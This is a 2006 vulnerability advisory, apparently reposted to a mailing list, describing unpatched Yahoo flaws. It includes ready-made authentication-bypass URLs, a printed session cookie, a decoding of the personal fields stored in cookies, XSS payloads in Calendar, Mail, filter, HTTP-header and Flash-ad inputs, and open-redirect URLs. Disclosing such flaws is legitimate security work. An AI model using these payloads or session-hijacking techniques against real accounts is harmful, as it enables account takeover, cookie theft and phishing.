__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Ring'em or ping'em. Make PC-to-phone calls as low as 1ยข/min with Yahoo! Messenger with Voice.
Yahoo Multiple Vulnerabilities (Authentication Bypass, Session Binding, Cookie Encoding Security Weakness, Cross-Site Scripting and URL Redirection)
############################################################################
XDisclose Advisory : XD100001
Advisory Released : 20th June 06
Credit : Rajesh Sethumadhavan
Class : Authentication Bypass
Session Binding Vulnerability
Cookies Encoding Security Weakness
Cross-Site Scripting
URL redirection
Severity : Medium
Solution Status : Unpatched
Vendor : Yahoo
Affected applications : Yahoo multiple web-based services
############################################################################
Overview:
Yahoo! Inc. is an American computer services company with a mission to
"be the most essential global Internet service for consumers and
businesses". It operates an Internet portal, including the popular
Yahoo! Mail.According to Web trends Yahoo! is the most visited
website on the Internet today with more than 400 million unique users.
The global network of Yahoo! websites received 3.4 billion page views
per day on average as of October 2005.
Various Yahoo! services are vulnerable to authentication bypass,
session binding, weak cookie encoding, cross-site scripting file
inclusion and url redirection vulnerabilities, which is caused
due to improper validation of user-supplied inputs.
Description:
Multiple vulnerabilities exist in various Yahoo services.
1. Authentication Bypass and Session Binding Vulnerability.
A malicious user can log on to the yahoo without submitting the
username and password by constructing a malicious URL using
cookies.
Same session (URL) can be used to login multiple times from
multiple IP address leading to session binding vulnerability.
POC: (UPDATED in Original Site)
--------------------------------------------------------------------------
http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
%26l=i42.j4ij/o&.t=T=sk=DAA07q67uzjeFv%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
BYQFRQUUBdGlwAVNQZHhvQgF6egFYdzhuRUJnV0E-&.done=http%3a//mail.yahoo.com
--------------------------------------------------------------------------
http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
%26l=i42.j4ij/o%26p=m2gvvind13000700&.t=T=sk=DAA07q67uzjeFv%26d=c2wBTlRVMU
FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFYdzhuRUJnV0E-&.done=http
%3a//mail.yahoo.com
--------------------------------------------------------------------------
Where in "sk" & "d" is session
Screenshot:
http://www.xdisclose.com/Yahoo_Auth_Bypass.png
2. Cookie Encoding Security Weakness
Implementation of cookies in yahoo is too weak that it can be
decoded easily. A malicious attacker can easily collect many
personal information using cookies like year of birth, zipcode,
country and name which can be used to get password from "yahoo
forgot password".
Where in
sk & d is session
n is password
l is username
p is country, year of birth, gender and more
b is cookies created
lg is language
intl is international language
iz is zipcode
jb is Industry and title
POC Screenshot:
http://www.xdisclose.com/Yahoo_Cookie_Encoding.png
3. Cross-Site Scripting.
This vulnerability is resulted from the failure of Yahoo! filtering
engine to block cretin user-supplied inputs
a) Yahoo Calendar Service XSS
The flaws are due to improper sanitization of inputs passed to
"Location", "Address", "Street" and "Phone".
=================================================================
This event repeats every day.
</font><br>
<font face="Arial" size=-1>
<b>Event Location</b>: <script>alert('Location')</script>
<br><b>Street</b>: <script>alert('Address')</script>
<br><b>City, State, Zip</b>: <script>alert('Street')</script>
<br><b>Phone</b>: <script>alert('Phone')</script>
</font><br>
=================================================================
Screenshot:
http://www.xdisclose.com/XSS_Calender_Address.png
http://www.xdisclose.com/XSS_Calender_Phone.png
http://www.xdisclose.com/XSS_Calender_location.png
http://www.xdisclose.com/XSS_Calender_Street.png
b) Yahoo Options Mail Account XSS
The flaws are due to improper sanitization of inputs passed to
"Name" and "Reply to" parameters.
=================================================================
<tr valign="top">
<td>Name:</td>
<td><script>alert('Name')</script></td>
</tr>
<tr valign="top">
<td>Email:</td>
<td>[EMAIL PROTECTED]</td>
</tr>
<tr valign="top">
<td>Reply-To:</td>
<td><script>alert('Reply')</script>@yah.com</td>
</tr>
=================================================================
Screenshot:
http://www.xdisclose.com/XSS_Mail_Account_Name.png
http://www.xdisclose.com/XSS_Mail_Account_Reply.png
c) Yahoo Options Filter XSS.
The flaws are due to improper sanitization of inputs passed to
"From" and "To" parameters
=================================================================
<b>From</b> contains
"<b><script>alert('From')</script>@yahoo.com</b>"
<br>
<b>To/CC</b> contains
"<b><script>alert('To')</script>@yahoo.com</b>"
<br>
=================================================================
Screenshot:
http://www.xdisclose.com/Xss_Filter_From.png
http://www.xdisclose.com/Xss_Filter_To.png
d) Yahoo Ads flash file XSS.
The flaws are due to improper sanitization of inputs passed to
flash Ads files
Exploit:
-----------------------------------------------------------------
http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
20060330_68006_1_425x600_monster_morph_asker_1_check.swf?
clickTAG=javascript:alert('XSS%20Possiable%20in%20
Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=
javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
%20\n%20By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=
javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
%20\n%20By%20Rajesh')
http://ad.ie.doubleclick.net/812666/specsavers_2
for1euro_300x250.swf?clickTAG=javascript:
alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20
By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=
javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
%20\n%20By%20Rajesh')
http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=
javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
%20\n%20By%20Rajesh')
http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
20060512_65459_1_360x100_mwa1_mail_accolades.swf?
clickTAG=javascript:alert('XSS%20Possiable%20in%20
Yahoo%20Ads%20\n%20By%20Rajesh')
and more
-----------------------------------------------------------------
Screenshot:
http://www.xdisclose.com/XSS_Flash_Ads.png
e) Yahoo Mail Beta HTTP Header XSS
The flaws are due to improper sanitization of inputs passed to
all HTTP header like Accept, Accept-Charset, Accept-Language,
Cache-Control, Connection, Content-Length, Content-Type,
Cookie, Keep-Alive, Pragma, SOAPAction and User-Agent in
Yahoo Mail Beta.
POC :
=================================================================
GET :
http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=
CKyO7/zcUU2
"Host: uk.f555.mail.yahoo.com
User-Agent: <script>alert('User-Agent:')</script>
Accept: text/xml,application/xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;<script>
alert('Accept:')</script>
Accept-Language: en-us,en;q=0.5;<script>alert('Accept-
Language:')</script>
Accept-Encoding: gzip,deflate;<script>alert('Accept-
Encoding:')</script>
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert
('Accept-Charset:')</script>
Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
Connection: keep-alive;<script>alert('Connection:')</script>
SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert
('SOAPAction:')</script>
Content-Length: <script>alert('Content-Length:')</script>
Content-Type: application/xml;<script>alert('Content-
Type:')</script>
Cookie: B=dcnl4j129c7tu&b=3&s=j3;
F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitn
kGkgOOjxwPKS6&b=bIpq;Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&
p=m2gvvind12000700&jb=19|24|&iz=123456
r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&
a=QAE&sk=DAAZ7oQuYalSuV&d=c2wBTlRVMUFUSTF
NVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0E-;
U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB
&un=0kvgvgv3qlf11;YM.dpref1=sec.test%3Aspp%257C1;<script>alert
('Cookie:')</script>
Pragma: no-cache;<script>alert('Pragma:')</script>
Cache-Control: no-cache;<script>alert('Cache-Control:')
</script>"
=================================================================
Screenshot:
http://www.xdisclose.com/XSS_MailBeta_Accept.png
http://www.xdisclose.com/XSS_MailBeta_Accept-Charset.png
http://www.xdisclose.com/XSS_MailBeta_Accept-Language.png
http://www.xdisclose.com/XSS_MailBeta_Cache-Control.png
http://www.xdisclose.com/XSS_MailBeta_Connection.png
http://www.xdisclose.com/XSS_MailBeta_Content-Length.png
http://www.xdisclose.com/XSS_MailBeta_Content-Type.png
http://www.xdisclose.com/XSS_MailBeta_Cookie.png
http://www.xdisclose.com/XSS_MailBeta_Keep-Alive.png
http://www.xdisclose.com/XSS_MailBeta_Pragma.png
http://www.xdisclose.com/XSS_MailBeta_SoapAction.png
http://www.xdisclose.com/XSS_MailBeta_User-Agent.png
Impact:
Successful exploitation allows execution of arbitrary script
code in a users browser session in context of an affected site
which may allow to steal cookie based authentication
credentials.
3. URL redirection.
This is due failure of filtering of incoming untrusted data before
the content reaches their users .This can be exploited for phishing
attack. The vulnerable parameters are yahoo search web, image,
video, preferences, cache, yahoo answers and more urls containing
/*http://yahoo.com or /**http://yahoo.com
Exploit:
---------------------------------------------------------------------------
http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/
EXP=1148028186/**http%3a//www.xdisclose.com
http://search.yahoo.com/preferences/preferences?pref_done=
http%3a//www.xdisclose.com
---------------------------------------------------------------------------
Screenshot:
http://www.xdisclose.com/URL_Redirection_WebSearch.png
http://www.xdisclose.com/URL_Redirection_Images.png
http://www.xdisclose.com/URL_Redirection_Video.png
4) Interesting facts about Yahoo
Yahoo Mail Inbox shows wrong unread messages count if it is above
65535 unread messages.
Screenshot:
http://www.xdisclose.com/Yahoo_Inbox.png
Original Advisory:
http://www.xdisclose.com/XD100001.txt
Credits:
Rajesh Sethumadhavan has been credited with the discovery of this
vulnerability
Disclaimer:
This entire document is strictly for educational, testing and
demonstrating purpose only. Modification use and/or publishing this
information is entirely on your own risk. The exploit code is to be
used on your own email account. I am not liable for any direct or
indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory._______________________________________________ darklab mailing list [email protected] http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab
